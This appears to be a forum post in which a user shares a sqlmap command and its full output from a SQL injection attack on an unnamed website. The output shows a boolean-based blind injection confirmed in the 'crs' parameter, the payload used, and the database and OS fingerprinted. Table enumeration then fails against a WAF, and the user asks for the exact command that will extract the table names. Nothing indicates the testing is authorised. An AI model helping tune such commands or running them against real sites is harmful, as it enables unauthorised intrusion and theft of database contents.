Hi
Null Connection is supported with 'skip-read' method
Because of that I am unable to retrieve table names. How can I overcome that?
I am using this:
sqlmap.py --random-agent --check-waf --identify-waf --risk=3 --level=5 --os=Linux --dbms=MySQL -u "url" -o --tables -D database --null-connection -z "flu,bat,tec=B,ban" --ignore-proxy --timeout=500 --retries=3 --threads=10 -p crs
Output:
[11:21:04] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[11:21:07] [WARNING] reflective value(s) found and filtering out
[11:21:29] [INFO] GET parameter 'crs' is 'OR boolean-based blind - WHERE or HAVING clause' injectable
[11:21:29] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[11:21:29] [INFO] checking if the injection point on GET parameter 'crs' is a false positive
GET parameter 'crs' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 281 HTTP(s) requests:
Place: GET
Parameter: crs
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: crs=-2646 OR (5878=5878)
[11:22:39] [INFO] testing MySQL
[11:22:47] [INFO] confirming MySQL
[11:23:01] [INFO] the back-end DBMS is MySQL
[11:23:01] [INFO] fetching banner
[11:23:01] [INFO] retrieving the length of query output
[11:23:01] [INFO] retrieved: 10
[11:25:21] [INFO] retrieved: xxxxxx
[11:25:21] [INFO] the back-end DBMS operating system is Linux
web application technology: Apache, PHP 5.3.27
back-end DBMS operating system: Linux
back-end DBMS: MySQL >= 5.0.0
banner: 'xxxxx'
[11:25:21] [INFO] fetching tables for database:
[11:25:21] [INFO] fetching number of tables for database
[11:25:21] [INFO] retrieved:
[11:25:23] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:25:23] [WARNING] unable to retrieve the number of tables for database
[11:25:23] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[11:25:23] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 1 times, 403 (Forbidden) - 260 times, 404 (Not Found) - 1 times, 502 (Bad Gateway) - 1 times
[11:25:23] [INFO] fetched data logged to text files under
[*] shutting down at 11:25:23
Can anyone tell me exactly what command I must use?
Thanks